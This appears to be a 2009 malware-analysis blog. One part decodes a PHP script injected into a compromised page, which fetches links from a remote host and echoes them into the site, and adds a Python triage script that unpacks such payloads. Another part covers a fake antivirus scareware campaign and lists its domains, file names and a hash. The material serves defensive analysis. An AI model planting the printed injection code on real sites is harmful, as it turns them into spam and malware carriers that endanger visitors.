Well, decoding the base64 content with the base64_decode() call present within the malicious page gives the script below, which is passed as an argument to eval(); eval() executes the script

error_reporting(0);

$links = new GetLinks();

echo $links->Links;

class GetLinks
{
    var $host = "esli.tw";                // remote link server contacted by the script
    var $path = "/link.php?site=";
    var $site = "";
    var $user_agent = "";

    var $Links = "";

    var $_socket_timeout = 12;
    var $_cashe_life_time = 3600;         // refetch at most once an hour
    var $_cashe_file = "cashe.txt";       // local copy of the fetched links

    function GetLinks()
    {
        // Fetch fresh links when the cache file is missing, empty or older than an hour
        if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {

            $this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
            $this->user_agent = $_SERVER['HTTP_USER_AGENT'];

            $this->Links = $this->fetch_remote_file();
            if ($handle = fopen($this->_cashe_file, 'w')) {
                fwrite($handle, $this->Links);
            }

            fclose($handle);
        }
        else {
            $this->Links = file_get_contents($this->_cashe_file);
        }
    }

    function fetch_remote_file()
    {
        // Raw HTTP GET to esli.tw, passing the infected site's hostname as a parameter
        $buff = '';
        $fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
        if (!$fp) {

        } else {
            $out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
            $out .= "Host: {$this->host}\r\n";
            $out .= "Connection: Close\r\n\r\n";

            fwrite($fp, $out);
            while (!feof($fp)) {
                $buff .= fgets($fp, 128);
            }
            fclose($fp);
            $page = explode("\r\n\r\n", $buff);
            return $page[1];              // response body, echoed into the page
        }
    }
}
I am not sure what cashe.txt does and what are its contents!
The HTML tag responsible for the execution of scripts, malware etc. is IFRAME.
Next blog will be most probably SmartDownload.exe binary analysis. Safe Surfing!!!
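As an added example (not from the post and not the injected script itself), a Python triage script for pages like this one: it peels nested eval(base64_decode(...)) layers and lists the hosts, URLs and iframe targets the payload would contact; the sample page is constructed inline with reserved .invalid domain names.

```python
"""Triage of an injected PHP page like the one above: find eval(base64_decode('...'))
wrappers, decode them layer by layer, and list the hosts, URLs and iframe sources the
payload would contact, so the callbacks can be blocked and the page cleaned."""
import base64
import re

EVAL_B64 = re.compile(rb"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)")
HOST_RE = re.compile(rb"fsockopen\s*\(\s*['\"]([^'\"]+)|\$host\s*=\s*['\"]([^'\"]+)|(https?://[\w.-]+[^\s'\"<>]*)")
IFRAME_RE = re.compile(rb"<iframe[^>]*src\s*=\s*['\"]?([^'\" >]+)", re.I)

def unwrap_layers(source, max_depth=5):
    """Decoded payloads, outermost first; stops when no wrapper is left or a decode fails."""
    layers, current = [], source
    for _ in range(max_depth):
        m = EVAL_B64.search(current)
        if not m:
            break
        try:
            current = base64.b64decode(re.sub(rb"\s", b"", m.group(1)), validate=True)
        except ValueError:                     # binascii.Error is a subclass of ValueError
            break
        layers.append(current)
    return layers

def indicators(blob):
    """Hosts, URLs and iframe targets mentioned in the decoded layers."""
    found = {g for groups in HOST_RE.findall(blob) for g in groups if g}
    return sorted(h.decode("utf-8", "replace") for h in found | set(IFRAME_RE.findall(blob)))

def triage_php(source):
    layers = unwrap_layers(source)
    return {"layers": len(layers), "indicators": indicators(b"".join(layers))}

def build_sample_page():
    """Constructed page (not the university's): two nested eval/base64 layers around a
    link fetcher like the one above, using reserved .invalid domain names."""
    inner = (b"$host = \"links.example.invalid\"; $path = \"/link.php?site=\";\n"
             b"echo '<iframe src=\"http://redirect.example.invalid/show.php\" width=0 height=0></iframe>';")
    middle = b"eval(base64_decode('" + base64.b64encode(inner) + b"'));"
    return (b"<html><body>\n<?php error_reporting(0); eval(base64_decode(\""
            + base64.b64encode(middle) + b"\")); ?>\n<p>page content</p></body></html>")
```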

Friday, September 4, 2009

Personal Antivirus: antimalwarescanner8.com/ best-antivirus8.com/ hqvirusscanner.com/ advancedpcscanner3.com

I typed my search keywords into Google and clicked on a few links on the first page of results. One site interested me because it was redirecting me to some other site; the malicious web page that was redirecting to the new page had an unnoticeable flash file named intro.swf embedded in it. The web page on the redirected site welcomes us with a pop-up window saying "Warning!!!Your system.......". The pop-up warning window is similar across all the malicious domains.
If we click OK or the Cross(X)/Close button it takes us to a fake scanning page depicting a real anti-virus scan of the PC.
After the scan it shows the scan results as in the figure below, mimicking a real anti-virus scan and stating that various directories on the PC are infected with trojans.
It asks the user to download "Personal Antivirus" to protect their PC.
Clicking anywhere on this page gives a pop-up window to download the anti-virus binary.
If we click on the page multiple times it pops up multiple windows for downloading the
Antivirus-[a-f0-9]{3,7}_2031.exe file. If we do "View Source" on the above page it shows a few interesting JavaScript files.
The contents of listfile.js were interesting because it had an array of various file names with EXE, HLP, DLL etc. extensions.
I downloaded different binary file samples but all the files had the same MD5 value. Surprising !!!
I tried to execute the sample on VMware with MS Windows XP SP2 installed. It gives the following memory access error on the VM. Is it detecting the VM environment?!!
I executed the same sample on MS Windows Server 2003 Standard Edition with SP2 but was not able to run the sample successfully.
Don't try to access domains with URI
http://maliciousdomain.com/1/?sess=p2T4yjjxMi01JmlwPTY3Ljk3LjgwLjUmdGltZT0xMjU1MUAMPQZM

The sess parameter changes with every malicious domain. I was a little suspicious that the sess parameter's value was base64 encoded; decoding it to ASCII gives
§døÊ8ñ2-5&ip=67.97.80.5&time=12551@ = L
Wow!! It contains an IP Address.

Malicious Domains:
hqvirusscanner.com
antimalwarescanner8.com
advancedpcscanner3.com
best-antivirus8.com
antivirus-fast-scan04.com
(new domains might come up soon)
File Name: Antivirus_[a-z0-9]{3,7}.exe
Antivirus-[a-f0-9]{3,7}_2031.exe
File Size: 163840 bytes
MD5: 22fb04afad00ccaeda1f5e5892493d77
Malware Type: Browser Hijackers
Threat Level: High

  • File is Packed with unknown packer.
  • PEiD doesn't give any packer name.
  • OllyDBG throws exception while loading the file.
  • Imports few APIs from KERNEL32.DLL
Virustotal results can be found at
http://www.virustotal.com/analisis/6a761c86645ca3b8b808a80f330ffb315dc5c175089abf7f8ff9ea2ddbbc57b2-1252076765

If I successfully run the malicious file then I will post a new blog. Be cautious while surfing the net and when you come across pop-ups!!